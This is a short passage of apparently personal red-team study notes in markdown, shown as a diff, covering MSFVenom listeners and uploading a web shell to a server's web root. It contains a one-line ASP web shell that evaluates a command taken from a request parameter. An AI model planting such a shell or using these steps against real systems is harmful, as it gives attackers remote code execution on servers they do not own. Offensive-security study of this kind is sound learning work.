Damuna/Notes/Red_theory.md

 <% eval request("cmd") %>
 ```

-## MSFVenom

-Get the shell from `msfconsole`, which is recommended for windows, use also the right listener from `msfconsole`

 ### Uploading a Web Shell

 Now we have to write one of the web shells above in the web root